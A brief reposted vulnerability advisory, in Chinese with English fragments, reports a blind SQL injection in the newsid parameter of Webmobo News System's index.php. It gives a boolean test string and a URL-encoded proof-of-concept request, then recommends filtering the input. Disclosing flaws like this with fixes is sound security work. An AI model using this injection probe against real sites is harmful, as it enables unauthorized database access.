标题: Webmobo News System Blind SQL Injection 作者: Eyup CELIK www.2cto.com 影响版本:所有版本 测试版本: All versions are Vulnerability 描述 Blind SQL Injection can be done using the command input 缺陷页面: index.php 示例: index.php?action=sendto&newsid=<Blind SQL Injection Code> 测试方法: index.php?action=sendto&newsid=1' and '2'='2 POC:
http://www.2cto.com /index.php?action=sendto&newsid=1%27%20and%20%272%27=%272 修复: 过滤index.php页面该参数输入、
致谢: Eyup CELIK Information Technology Security Specialist
查看更多关于Webmobo WB News System盲注缺陷及修复 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11428